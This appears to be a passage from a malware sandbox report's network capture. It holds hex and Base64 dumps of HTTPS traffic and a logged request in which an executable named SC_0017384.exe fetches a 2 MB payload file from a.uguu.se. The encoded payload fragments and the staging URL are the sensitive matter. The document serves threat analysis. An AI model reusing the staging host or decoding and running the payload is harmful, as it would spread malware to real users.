                                                                            Data Ascii: wQABcd+AAAAKiD///oiPxcIEf//+SU4AAAALyAmBgAC8ygDEQAR///5OTgAAAAgIP///644///5SDgAAAAEIAMTlFgBE1gXJQERAwL///lfOAAAAA4gJv//+Wo5BAAFdHsEAAXHfgAAAAUgAAAAmf///X////5KAAAARQAAAARFBRH///mVOAAAAAEgJv//+aA5BAAFn3sEAAXHfgAAAAEg///7xjj///m5OAAAACEgAAABVzmUWAERAwL///nO
                                                                            2023-03-21 08:11:06 UTC3682INData Raw: 33 37 2f 2f 2f 77 37 4f 41 41 41 41 42 63 67 41 41 41 41 61 44 34 41 41 41 45 66 49 41 63 52 2f 2f 2f 38 55 54 67 41 41 41 41 38 49 41 51 41 41 4b 79 41 41 67 41 41 58 49 30 67 48 77 41 41 41 71 30 34 42 41 41 41 73 6f 41 42 41 41 41 44 6a 52 34 66 2f 2f 2f 38 65 44 67 41 41 41 41 4e 49 43 62 2f 2f 2f 79 44 4f 67 51 41 42 62 46 37 42 41 41 46 78 33 34 41 41 41 41 51 49 41 55 54 41 41 41 41 6b 43 44 2f 2f 2f 79 65 4f 41 41 41 41 43 73 67 4a 76 2f 2f 2f 4b 6b 35 42 41 41 46 72 6e 73 45 41 41 58 48 66 67 41 41 41 42 59 67 41 41 41 42 71 44 34 66 48 77 67 52 41 41 41 43 31 54 67 44 45 78 62 2f 2f 2f 7a 4f 4f 41 41 41 41 47 55 67 4a 76 2f 2f 2f 4e 6b 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41 41 47 4d 67 6e 67 34 66 45 42 38 45 41 41 43 75 66 76 2f 2f
                                                                            Data Ascii: 37///w7OAAAABcgAAAAaD4AAAEfIAcR///8UTgAAAA8IAQAAKyAAgAAXI0gHwAAAq04BAAAsoABAAADjR4f///8eDgAAAANICb///yDOgQABbF7BAAFx34AAAAQIAUTAAAAkCD///yeOAAAACsgJv///Kk5BAAFrnsEAAXHfgAAABYgAAABqD4fHwgRAAAC1TgDExb///zOOAAAAGUgJv///Nk6BAAFmXsEAAXHfgAAAGMgng4fEB8EAACufv//
                                                                            2023-03-21 08:11:06 UTC3698INData Raw: 62 63 67 2f 2f 2f 2b 35 7a 67 41 41 41 41 42 49 43 62 2f 2f 2f 37 79 4f 67 51 41 42 5a 70 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 41 42 38 35 41 41 41 4d 2f 76 2f 2f 2f 77 38 34 41 41 41 41 42 53 41 45 41 41 43 65 66 51 45 41 41 44 69 4e 57 52 38 2f 57 46 51 67 59 51 42 78 76 30 30 67 48 30 37 6e 4b 53 41 41 41 41 6e 2b 2f 2f 2f 2f 4f 44 67 41 41 41 41 41 49 43 62 2f 2f 2f 39 44 4f 67 51 41 42 5a 4a 37 42 41 41 46 78 33 34 41 41 41 41 41 49 41 41 41 44 76 34 47 41 41 4b 4f 4b 41 59 41 41 6f 30 6f 42 41 41 41 6e 48 34 47 41 41 4b 4d 4b 50 2f 2f 2f 32 38 34 41 41 41 41 42 43 44 2f 2f 2f 2b 62 4f 50 2f 2f 2f 36 41 34 4a 67 6f 41 41 4c 31 76 61 59 34 45 41 41 43 65 65 77 41 41 43 66 35 6c 59 67 41 41 41 41 49 67 41 41 41 41 41 43 41 45 41 41 43 65
                                                                            Data Ascii: bcg///+5zgAAAABICb///7yOgQABZp7BAAFx34AAAAAIAAAAB85AAAM/v///w84AAAABSAEAACefQEAADiNWR8/WFQgYQBxv00gH07nKSAAAAn+////ODgAAAAAICb///9DOgQABZJ7BAAFx34AAAAAIAAADv4GAAKOKAYAAo0oBAAAnH4GAAKMKP///284AAAABCD///+bOP///6A4JgoAAL1vaY4EAACeewAACf5lYgAAAAIgAAAAACAEAACe
                                                                            2023-03-21 08:11:06 UTC3714INData Raw: 38 34 41 41 41 53 41 41 41 41 42 36 67 41 41 42 76 34 41 41 41 4d 36 41 41 41 43 6d 51 41 41 42 6e 6f 41 41 41 62 6a 41 41 41 43 36 51 41 41 41 36 38 41 41 41 54 41 41 41 41 42 78 41 41 41 41 34 77 41 41 41 50 79 41 41 41 43 51 51 41 41 42 50 30 41 41 41 41 46 41 41 41 41 55 41 41 41 42 4c 45 41 41 41 67 46 41 41 41 45 5a 41 41 41 42 54 6b 41 41 41 48 35 41 41 41 46 68 41 41 41 41 79 30 41 41 41 4c 59 41 41 41 42 6d 67 41 41 42 52 6b 41 41 41 54 4f 41 41 41 44 70 77 41 41 41 61 6b 41 41 41 62 57 41 41 41 42 48 77 41 41 41 76 67 41 41 41 56 7a 41 41 41 43 61 67 41 41 41 56 49 41 41 41 61 58 41 41 41 48 38 67 41 41 42 55 4d 41 41 41 4e 2b 41 41 41 48 4b 77 41 41 42 46 4d 41 41 41 41 55 41 41 41 49 44 51 41 41 42 41 45 41 41 41 5a 5a 41 41 41 47 70 51 41 41
                                                                            Data Ascii: 84AAASAAAAB6gAABv4AAAM6AAACmQAABnoAAAbjAAAC6QAAA68AAATAAAABxAAAA4wAAAPyAAACQQAABP0AAAAFAAAAUAAABLEAAAgFAAAEZAAABTkAAAH5AAAFhAAAAy0AAALYAAABmgAABRkAAATOAAADpwAAAakAAAbWAAABHwAAAvgAAAVzAAACagAAAVIAAAaXAAAH8gAABUMAAAN+AAAHKwAABFMAAAAUAAAIDQAABAEAAAZZAAAGpQAA
                                                                            2023-03-21 08:11:06 UTC3730INData Raw: 64 6f 41 41 41 65 49 41 41 41 44 61 77 41 41 42 48 77 41 41 41 55 49 41 41 41 44 68 41 41 41 42 36 77 41 41 41 58 71 41 41 41 44 65 67 41 41 43 48 34 41 41 41 50 4f 41 41 41 42 2b 77 41 41 41 41 55 41 41 41 45 32 41 41 41 41 71 51 41 41 43 41 51 41 41 41 46 32 41 41 41 44 37 67 41 41 41 6c 6b 41 41 41 51 67 41 41 41 44 43 67 41 41 41 76 63 41 41 41 4b 78 41 41 41 47 35 67 41 41 42 70 73 41 41 41 67 6f 41 41 41 43 44 41 41 41 42 56 73 41 41 41 4b 6b 41 41 41 44 4f 51 41 41 42 39 34 41 41 41 55 66 41 41 41 44 4c 67 41 41 41 42 59 41 41 41 5a 33 41 41 41 42 74 67 41 41 41 61 4d 41 41 41 4c 52 41 41 41 41 66 51 41 41 41 55 51 41 41 41 42 48 52 51 41 51 44 50 34 41 41 41 64 78 4f 42 77 54 43 67 41 41 6e 57 38 4b 41 41 43 63 62 77 45 52 41 41 44 2f 2f 2f 2b 35
                                                                            Data Ascii: doAAAeIAAADawAABHwAAAUIAAADhAAAB6wAAAXqAAADegAACH4AAAPOAAAB+wAAAAUAAAE2AAAAqQAACAQAAAF2AAAD7gAAAlkAAAQgAAADCgAAAvcAAAKxAAAG5gAABpsAAAgoAAACDAAABVsAAAKkAAADOQAAB94AAAUfAAADLgAAABYAAAZ3AAABtgAAAaMAAALRAAAAfQAAAUQAAABHRQAQDP4AAAdxOBwTCgAAnW8KAACcbwERAAD///+5
                                                                            2023-03-21 08:11:06 UTC3746INData Raw: 41 41 46 78 33 34 41 41 41 42 42 49 50 2f 2f 2b 35 67 34 2f 2f 2f 34 2f 54 67 41 41 41 42 58 49 41 6b 54 46 77 41 41 42 51 59 34 41 41 41 46 45 54 67 57 2f 2f 2f 35 46 54 67 41 41 41 41 6c 49 43 62 2f 2f 2f 6b 67 4f 51 51 41 42 58 4a 37 42 41 41 46 78 33 34 41 41 41 41 46 49 50 2f 2f 2f 4a 59 34 2f 2f 2f 35 4f 54 67 41 41 41 41 78 49 43 62 2f 2f 2f 6c 45 4f 67 51 41 42 62 70 37 42 41 41 46 78 33 34 41 41 41 42 4d 49 41 41 41 41 57 63 34 2f 2f 2f 35 58 54 67 41 41 41 42 52 49 43 62 2f 2f 2f 6c 6f 4f 67 51 41 42 63 70 37 42 41 41 46 78 33 34 41 41 41 42 59 49 50 2f 2f 2f 2b 63 36 41 52 45 41 41 41 56 33 4f 41 41 41 42 58 30 34 42 67 41 43 47 53 67 71 41 52 45 41 41 41 49 35 4f 50 2f 2f 2f 72 6f 34 2f 2f 2f 35 6e 7a 67 41 41 41 41 72 49 41 63 54 2b 42 2f 2f
                                                                            Data Ascii: AAFx34AAABBIP//+5g4///4/TgAAABXIAkTFwAABQY4AAAFETgW///5FTgAAAAlICb///kgOQQABXJ7BAAFx34AAAAFIP///JY4///5OTgAAAAxICb///lEOgQABbp7BAAFx34AAABMIAAAAWc4///5XTgAAABRICb///loOgQABcp7BAAFx34AAABYIP///+c6AREAAAV3OAAABX04BgACGSgqAREAAAI5OP///ro4///5nzgAAAArIAcT+B//
                                                                            2023-03-21 08:11:06 UTC3762INData Raw: 33 73 41 41 41 5a 65 41 41 41 42 59 51 41 41 42 68 6b 41 41 41 4b 56 41 41 41 44 72 51 41 41 41 45 30 41 41 41 42 57 41 41 41 47 65 51 41 41 42 4e 59 41 41 41 4b 4c 41 41 41 47 73 67 41 41 42 4c 49 41 41 41 69 4d 41 41 41 46 35 41 41 41 42 53 55 41 41 41 42 35 41 41 41 44 44 77 41 41 42 71 4d 41 41 41 54 76 41 41 41 41 42 51 41 41 42 48 38 41 41 41 63 47 41 41 41 43 39 67 41 41 42 65 30 41 41 41 64 59 41 41 41 43 75 51 41 41 41 4b 34 41 41 41 51 42 41 41 41 45 45 41 41 41 42 6f 4d 41 41 41 56 2b 41 41 41 43 43 41 41 41 42 44 77 41 41 41 66 6b 41 41 41 43 59 51 41 41 42 38 30 41 41 41 42 71 41 41 41 44 6b 51 41 41 42 44 49 41 41 41 45 2b 41 41 41 41 2b 41 41 41 42 67 67 41 41 41 59 2b 41 41 41 43 7a 51 41 41 42 4f 41 41 41 41 58 39 41 41 41 41 50 41 41 41
                                                                            Data Ascii: 3sAAAZeAAABYQAABhkAAAKVAAADrQAAAE0AAABWAAAGeQAABNYAAAKLAAAGsgAABLIAAAiMAAAF5AAABSUAAAB5AAADDwAABqMAAATvAAAABQAABH8AAAcGAAAC9gAABe0AAAdYAAACuQAAAK4AAAQBAAAEEAAABoMAAAV+AAACCAAABDwAAAfkAAACYQAAB80AAABqAAADkQAABDIAAAE+AAAA+AAABggAAAY+AAACzQAABOAAAAX9AAAAPAAA
                                                                            2023-03-21 08:11:06 UTC3778INData Raw: 2f 6a 2b 4f 41 41 41 41 41 38 67 2f 2f 2f 39 4f 7a 6a 2f 2f 2f 6b 4e 4f 41 41 41 41 43 55 67 4a 76 2f 2f 2b 52 67 36 42 41 41 46 73 33 73 45 41 41 58 48 66 67 41 41 41 44 49 67 43 78 4f 45 48 2f 2f 2f 2b 54 41 34 41 41 41 41 42 69 44 2f 2f 2f 35 55 4f 50 2f 2f 2f 50 73 34 43 68 4d 57 41 41 41 42 74 7a 6a 2f 2f 2f 36 62 4f 50 2f 2f 2b 56 45 34 41 41 41 41 41 53 41 6d 2f 2f 2f 35 58 44 6f 45 41 41 57 75 65 77 51 41 42 63 64 2b 41 41 41 41 49 43 41 45 45 78 58 2f 2f 2f 75 75 4f 41 41 41 41 67 48 2f 2f 2f 77 39 2f 2f 2f 37 2b 66 2f 2f 2f 54 30 41 41 41 41 45 52 56 6c 42 48 77 45 52 2f 2f 2f 35 6b 6a 67 41 41 41 41 4b 49 43 62 2f 2f 2f 6d 64 4f 67 51 41 42 59 68 37 42 41 41 46 78 33 34 41 41 41 41 4b 49 50 2f 2f 2f 47 55 34 2f 2f 2f 35 74 6a 67 41 41 41 41 61
                                                                            Data Ascii: /j+OAAAAA8g///9Ozj///kNOAAAACUgJv//+Rg6BAAFs3sEAAXHfgAAADIgCxOEH///+TA4AAAABiD///5UOP///Ps4ChMWAAABtzj///6bOP//+VE4AAAAASAm///5XDoEAAWuewQABcd+AAAAICAEExX///uuOAAAAgH///w9///7+f///T0AAAAERVlBHwER///5kjgAAAAKICb///mdOgQABYh7BAAFx34AAAAKIP///GU4///5tjgAAAAa
                                                                            2023-03-21 08:11:06 UTC3794INData Raw: 32 55 41 41 41 42 61 41 41 41 41 54 51 41 41 41 4d 41 41 41 41 4a 34 41 41 41 45 39 77 41 41 41 4c 63 41 41 41 4e 30 41 41 41 47 30 51 41 41 41 65 45 41 41 41 4b 38 41 41 41 43 56 41 41 41 41 2f 77 41 41 41 49 38 41 41 41 42 6a 67 41 41 43 4e 59 41 41 41 65 65 41 41 41 48 77 67 41 41 41 55 77 41 41 41 43 72 41 41 41 45 71 77 41 41 42 55 6f 41 41 41 4a 47 41 41 41 45 78 67 41 41 42 47 45 41 41 41 43 4c 41 41 41 43 32 41 41 41 43 44 6f 41 41 41 51 6f 41 41 41 43 47 41 41 41 41 48 34 41 41 41 52 59 41 41 41 41 51 6b 55 41 46 51 7a 2b 41 41 41 41 42 44 67 41 41 41 41 4f 49 43 59 41 41 41 41 50 4f 67 51 41 42 58 74 37 42 41 41 46 78 33 34 41 41 41 41 69 49 41 41 41 43 53 55 34 41 41 41 41 41 41 41 4c 4c 54 67 41 41 41 73 79 41 41 41 41 41 55 55 41 43 77 7a 2b
                                                                            Data Ascii: 2UAAABaAAAATQAAAMAAAAJ4AAAE9wAAALcAAAN0AAAG0QAAAeEAAAK8AAACVAAAA/wAAAI8AAABjgAACNYAAAeeAAAHwgAAAUwAAACrAAAEqwAABUoAAAJGAAAExgAABGEAAACLAAAC2AAACDoAAAQoAAACGAAAAH4AAARYAAAAQkUAFQz+AAAABDgAAAAOICYAAAAPOgQABXt7BAAFx34AAAAiIAAACSU4AAAAAAALLTgAAAsyAAAAAUUACwz+
                                                                            2023-03-21 08:11:06 UTC3810INData Raw: 41 41 41 44 53 41 47 45 2f 73 66 41 41 41 42 38 6a 6a 2f 2f 2f 2b 6d 4f 50 2f 2f 2f 78 51 34 41 41 41 43 4e 54 67 41 41 50 2f 2f 2f 49 67 34 41 41 41 41 51 53 41 6d 2f 2f 2f 38 6b 7a 6b 45 41 41 56 37 65 77 51 41 42 63 64 2b 41 41 41 41 4e 43 41 41 41 41 4f 35 4f 50 2f 2f 2f 4b 77 34 41 41 41 41 42 69 41 46 45 2f 63 66 2f 2f 2f 38 75 6a 67 41 41 41 41 7a 49 41 51 54 64 42 38 41 41 41 58 6c 4f 41 77 54 2b 52 2f 2f 2f 2f 7a 52 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2f 4e 77 36 42 41 41 46 68 6e 73 45 41 41 58 48 66 67 41 41 41 45 59 67 41 41 41 43 63 44 67 41 41 41 46 70 4f 41 4d 54 68 68 2f 2f 2f 2f 7a 2b 4f 41 41 41 41 42 67 67 2f 2f 2f 2f 56 7a 6a 2f 2f 2f 30 4e 4f 41 41 41 41 44 55 67 4a 76 2f 2f 2f 52 67 36 42 41 41 46 6d 58 73 45 41 41 58 48 66 67 41 41
                                                                            Data Ascii: AAADSAGE/sfAAAB8jj///+mOP///xQ4AAACNTgAAP///Ig4AAAAQSAm///8kzkEAAV7ewQABcd+AAAANCAAAAO5OP///Kw4AAAABiAFE/cf///8ujgAAAAzIAQTdB8AAAXlOAwT+R////zROAAAAAAgJv///Nw6BAAFhnsEAAXHfgAAAEYgAAACcDgAAAFpOAMThh////z+OAAAABgg////Vzj///0NOAAAADUgJv///Rg6BAAFmXsEAAXHfgAA
                                                                            2023-03-21 08:11:06 UTC3826INData Raw: 2f 75 56 4f 41 41 41 41 44 63 67 2f 2f 2f 2f 59 54 6a 2f 2f 2f 75 6b 4f 41 41 41 41 41 34 67 42 42 4f 44 48 2f 2f 2f 2b 37 49 34 41 41 41 41 47 69 44 2f 2f 2f 39 50 4f 50 2f 2f 2b 38 45 34 41 41 41 41 49 43 41 6d 2f 2f 2f 37 7a 44 6b 45 41 41 57 71 65 77 51 41 42 63 64 2b 41 41 41 41 48 79 41 41 41 41 45 66 4f 50 2f 2f 2b 2b 55 34 41 41 41 41 4e 53 41 47 45 34 63 66 2f 2f 2f 37 38 7a 67 41 41 41 41 4d 49 41 51 54 67 68 2f 2f 2f 2f 77 42 4f 41 41 41 41 42 59 67 4a 76 2f 2f 2f 41 77 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 4d 67 2f 2f 2f 2b 32 54 6a 2f 2f 2f 2b 70 4f 41 45 54 46 76 2f 2f 2f 43 30 34 41 41 41 41 43 53 41 42 45 32 45 39 48 77 45 52 2f 2f 2f 2f 4d 54 67 48 45 33 6f 66 2f 2f 2f 38 52 7a 67 41 41 41 41 41 49 43 62 2f 2f 2f 78 53
                                                                            Data Ascii: /uVOAAAADcg////YTj///ukOAAAAA4gBBODH///+7I4AAAAGiD///9POP//+8E4AAAAICAm///7zDkEAAWqewQABcd+AAAAHyAAAAEfOP//++U4AAAANSAGE4cf///78zgAAAAMIAQTgh////wBOAAAABYgJv///Aw6BAAFn3sEAAXHfgAAAAMg///+2Tj///+pOAETFv///C04AAAACSABE2E9HwER////MTgHE3of///8RzgAAAAAICb///xS
                                                                            2023-03-21 08:11:06 UTC3842INData Raw: 2f 2f 36 58 44 6f 45 41 41 57 73 65 77 51 41 42 63 64 2b 41 41 41 41 58 79 41 75 45 32 46 44 48 79 34 52 41 41 41 4e 38 6a 67 41 41 41 33 39 4f 42 59 41 41 41 4f 49 4f 41 41 41 44 75 67 34 41 41 41 47 72 44 67 50 45 31 67 6f 48 77 38 52 41 48 6f 4b 41 41 42 53 63 2f 2f 2f 2b 70 38 34 41 41 41 41 57 69 41 73 45 2f 67 66 2f 2f 2f 36 72 54 67 41 41 41 41 73 49 41 41 41 42 38 38 34 2f 2f 2f 39 56 6a 67 64 45 77 48 2b 46 67 59 41 41 49 64 76 41 68 49 4d 45 51 41 52 4e 52 45 45 41 41 41 4c 65 77 51 52 42 41 41 41 4b 48 35 36 43 67 41 41 55 6e 50 2f 2f 2f 72 6c 4f 41 41 41 41 41 67 67 4a 76 2f 2f 2b 76 41 36 42 41 41 46 6e 33 73 45 41 41 58 48 66 67 41 41 41 41 51 67 4c 52 4d 61 2f 2f 2f 37 42 7a 67 41 41 41 42 65 49 41 38 54 57 41 41 41 41 50 67 67 42 68 46 36
                                                                            Data Ascii: //6XDoEAAWsewQABcd+AAAAXyAuE2FDHy4RAAAN8jgAAA39OBYAAAOIOAAADug4AAAGrDgPE1goHw8RAHoKAABSc///+p84AAAAWiAsE/gf///6rTgAAAAsIAAAB884///9VjgdEwH+FgYAAIdvAhIMEQARNREEAAALewQRBAAAKH56CgAAUnP///rlOAAAAAggJv//+vA6BAAFn3sEAAXHfgAAAAQgLRMa///7BzgAAABeIA8TWAAAAPggBhF6
                                                                            2023-03-21 08:11:06 UTC3858INData Raw: 41 41 41 41 42 4d 67 4a 76 2f 2f 2b 32 55 35 42 41 41 46 73 48 73 45 41 41 58 48 66 67 41 41 41 44 67 67 2f 2f 2f 38 78 54 6a 2f 2f 2f 74 2b 4f 41 41 41 41 41 41 67 4a 76 2f 2f 2b 34 6b 35 42 41 41 46 6e 6e 73 45 41 41 58 48 66 67 41 41 41 41 41 67 41 78 4e 68 51 52 38 44 45 66 2f 2f 2b 36 51 34 41 41 41 41 4d 79 44 2f 2f 2f 2b 43 4f 50 2f 2f 2b 37 4d 34 41 41 41 41 4c 69 41 6d 2f 2f 2f 37 76 6a 6f 45 41 41 57 55 65 77 51 41 42 63 64 2b 41 41 41 41 48 43 41 41 41 41 41 75 4f 50 2f 2f 2b 39 63 34 41 41 41 41 49 79 41 41 41 41 4c 38 2f 2f 2f 39 2b 76 2f 2f 2f 61 6f 41 41 41 41 44 52 56 67 39 48 77 4d 52 2f 2f 2f 37 39 7a 67 41 41 41 41 38 49 50 2f 2f 2f 58 41 34 2f 2f 2f 38 42 6a 67 41 41 41 41 68 49 43 62 2f 2f 2f 77 52 4f 51 51 41 42 59 64 37 42 41 41 46
                                                                            Data Ascii: AAAABMgJv//+2U5BAAFsHsEAAXHfgAAADgg///8xTj///t+OAAAAAAgJv//+4k5BAAFnnsEAAXHfgAAAAAgAxNhQR8DEf//+6Q4AAAAMyD///+COP//+7M4AAAALiAm///7vjoEAAWUewQABcd+AAAAHCAAAAAuOP//+9c4AAAAIyAAAAL8///9+v///aoAAAADRVg9HwMR///79zgAAAA8IP///XA4///8BjgAAAAhICb///wROQQABYd7BAAF
                                                                            2023-03-21 08:11:06 UTC3874INData Raw: 4f 61 64 49 48 41 41 42 61 46 79 41 67 59 41 41 53 55 6f 41 41 44 74 68 43 42 77 41 41 56 56 63 67 6f 41 41 44 4e 76 43 78 48 2f 2f 2f 77 4e 4f 41 41 41 41 42 67 67 4a 76 2f 2f 2f 42 67 36 42 41 41 46 78 58 73 45 41 41 58 48 66 67 41 41 41 41 59 67 2f 2f 2f 39 58 54 6a 2f 2f 2f 77 78 4f 41 41 41 41 44 6b 67 4a 76 2f 2f 2f 44 77 36 42 41 41 46 6d 6e 73 45 41 41 58 48 66 67 41 41 41 44 6b 67 41 41 41 43 5a 77 41 41 42 46 45 41 41 41 4c 62 41 41 41 41 41 30 56 5a 50 42 38 48 45 51 41 41 41 61 51 34 41 41 41 43 66 7a 6a 2f 2f 2f 78 77 4f 41 41 41 41 42 6b 67 4a 76 2f 2f 2f 48 73 35 42 41 41 46 71 48 73 45 41 41 58 48 66 67 41 41 41 41 6f 67 41 41 41 42 48 54 6a 2f 2f 2f 79 55 4f 41 41 41 41 43 77 67 4a 76 2f 2f 2f 4a 38 35 42 41 41 46 75 33 73 45 41 41 58 48
                                                                            Data Ascii: OadIHAABaFyAgYAASUoAADthCBwAAVVcgoAADNvCxH///wNOAAAABggJv///Bg6BAAFxXsEAAXHfgAAAAYg///9XTj///wxOAAAADkgJv///Dw6BAAFmnsEAAXHfgAAADkgAAACZwAABFEAAALbAAAAA0VZPB8HEQAAAaQ4AAACfzj///xwOAAAABkgJv///Hs5BAAFqHsEAAXHfgAAAAogAAABHTj///yUOAAAACwgJv///J85BAAFu3sEAAXH
                                                                            2023-03-21 08:11:06 UTC3890INData Raw: 2f 79 45 4f 50 2f 2f 2b 65 6b 34 41 41 41 41 43 69 41 6d 2f 2f 2f 35 39 44 6f 45 41 41 56 38 65 77 51 41 42 63 64 2b 41 41 41 41 41 69 41 44 45 32 45 36 48 77 4d 52 2f 2f 2f 36 44 7a 67 41 41 41 41 53 49 41 41 41 41 68 67 34 2f 2f 2f 36 47 6a 67 41 42 77 37 2b 41 41 41 41 4b 53 41 4a 45 34 4d 66 2f 2f 2f 36 4d 44 67 41 41 41 41 53 49 43 62 2f 2f 2f 6f 37 4f 51 51 41 42 5a 74 37 42 41 41 46 78 33 34 41 41 41 42 4b 49 41 55 54 59 54 67 66 42 52 48 2f 2f 2f 70 57 4f 41 41 41 41 44 38 67 41 41 41 44 36 44 6a 2f 2f 2f 70 6c 4f 41 41 41 41 45 41 67 4a 76 2f 2f 2b 6e 41 35 42 41 41 46 75 6e 73 45 41 41 58 48 66 67 41 41 41 44 59 67 41 68 4e 38 48 2f 2f 2f 2f 4f 4d 34 41 41 41 43 6a 44 6a 2f 2f 2f 71 53 4f 41 41 41 41 44 73 67 2f 2f 2f 39 6d 2f 2f 2f 2f 57 76 2f
                                                                            Data Ascii: /yEOP//+ek4AAAACiAm///59DoEAAV8ewQABcd+AAAAAiADE2E6HwMR///6DzgAAAASIAAAAhg4///6GjgABw7+AAAAKSAJE4Mf///6MDgAAAASICb///o7OQQABZt7BAAFx34AAABKIAUTYTgfBRH///pWOAAAAD8gAAAD6Dj///plOAAAAEAgJv//+nA5BAAFunsEAAXHfgAAADYgAhN8H////OM4AAACjDj///qSOAAAADsg///9m////Wv/
                                                                            2023-03-21 08:11:06 UTC3906INData Raw: 41 42 74 49 43 62 2f 2f 2f 73 54 4f 67 51 41 42 5a 5a 37 42 41 41 46 78 33 34 41 41 41 41 77 49 41 41 41 43 33 49 34 2f 2f 2f 37 4c 44 67 41 41 41 41 33 49 41 59 41 41 53 73 6f 2f 2f 2f 37 4f 7a 67 41 41 41 41 4a 49 43 62 2f 2f 2f 74 47 4f 67 51 41 42 62 6c 37 42 41 41 46 78 33 34 41 41 41 41 4d 49 41 41 41 41 67 63 34 41 41 41 41 41 41 52 55 4f 42 73 54 2b 68 38 41 41 42 42 79 4f 41 41 41 45 48 30 34 46 76 2f 2f 2b 33 55 34 41 41 41 41 54 53 41 59 45 33 34 66 2f 2f 2f 37 67 7a 67 41 41 41 43 4b 49 41 41 41 44 38 30 34 2f 2f 2f 37 6b 6a 67 41 41 41 42 56 49 43 62 2f 2f 2f 75 64 4f 67 51 41 42 5a 64 37 42 41 41 46 78 33 34 41 41 41 42 67 49 41 41 41 43 39 59 41 41 41 6e 69 41 41 41 4e 4f 67 41 41 41 41 4e 46 57 54 34 66 47 42 48 2f 2f 2f 76 44 4f 41 41 51
                                                                            Data Ascii: ABtICb///sTOgQABZZ7BAAFx34AAAAwIAAAC3I4///7LDgAAAA3IAYAASso///7OzgAAAAJICb///tGOgQABbl7BAAFx34AAAAMIAAAAgc4AAAAAARUOBsT+h8AABByOAAAEH04Fv//+3U4AAAATSAYE34f///7gzgAAACKIAAAD804///7kjgAAABVICb///udOgQABZd7BAAFx34AAABgIAAAC9YAAAniAAANOgAAAANFWT4fGBH///vDOAAQ


                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                            2192.168.2.549701188.40.83.211443C:\Users\user\Desktop\SC_0017384.exe
                                                                            TimestampkBytes transferredDirectionData
                                                                            2023-03-21 08:11:12 UTC3909OUTGET /fwvfviJb.dat HTTP/1.1
                                                                            Host: a.uguu.se
                                                                            Connection: Keep-Alive
                                                                            2023-03-21 08:11:13 UTC3909INHTTP/1.1 200 OK
                                                                            Server: nginx
                                                                            Date: Tue, 21 Mar 2023 08:11:12 GMT
                                                                            Content-Type: application/octet-stream
                                                                            Content-Length: 2000896
                                                                            Last-Modified: Mon, 20 Mar 2023 22:39:50 GMT
                                                                            Connection: close
                                                                            ETag: "6418e0b6-1e8800"
                                                                            X-XSS-Protection: 1; mode=block
                                                                            X-Content-Type-Options: nosniff
                                                                            Referrer-Policy: no-referrer-when-downgrade
                                                                            Content-Security-Policy: default-src 'self' http: https: data: blob: 'unsafe-inline'; frame-ancestors 'self';
                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                            Accept-Ranges: bytes
                                                                            2023-03-21 08:11:13 UTC3909INData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                            Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                            2023-03-21 08:11:13 UTC3925INData Raw: 73 63 75 62 33 55 33 36 37 38 44 41 41 39 37 33 42 6e 74 57 46 52 4e 2f 7a 69 6e 37 54 66 48 45 6e 6b 4b 56 73 61 71 78 46 6d 55 58 7a 76 35 79 75 42 66 35 35 46 50 75 53 61 78 77 52 70 70 53 52 57 42 53 48 4f 77 39 6c 4f 74 58 6f 57 61 34 44 6f 36 49 73 72 55 35 37 6b 32 2f 54 62 41 79 50 42 72 79 73 38 50 72 36 57 32 76 56 61 46 44 4e 51 62 54 6b 4d 68 44 4d 72 50 79 53 31 76 43 31 6b 73 31 66 47 76 7a 4d 5a 69 4a 63 47 2f 65 53 73 37 62 45 5a 57 33 4e 62 2f 64 35 4b 76 41 4a 6e 34 79 4f 79 7a 47 53 48 4e 48 75 66 69 54 6e 43 36 73 7a 7a 75 39 6a 71 63 61 74 6c 2b 4b 55 6d 72 4a 4a 46 42 75 63 72 41 41 68 7a 4d 64 39 41 65 45 73 4e 74 44 32 43 71 36 70 67 74 66 4e 7a 56 4f 7a 2b 6e 35 69 77 36 68 78 36 33 75 45 71 6a 37 30 79 37 4c 51 51 66 74 5a 54 50
                                                                            Data Ascii: scub3U3678DAA973BntWFRN/zin7TfHEnkKVsaqxFmUXzv5yuBf55FPuSaxwRppSRWBSHOw9lOtXoWa4Do6IsrU57k2/TbAyPBrys8Pr6W2vVaFDNQbTkMhDMrPyS1vC1ks1fGvzMZiJcG/eSs7bEZW3Nb/d5KvAJn4yOyzGSHNHufiTnC6szzu9jqcatl+KUmrJJFBucrAAhzMd9AeEsNtD2Cq6pgtfNzVOz+n5iw6hx63uEqj70y7LQQftZTP
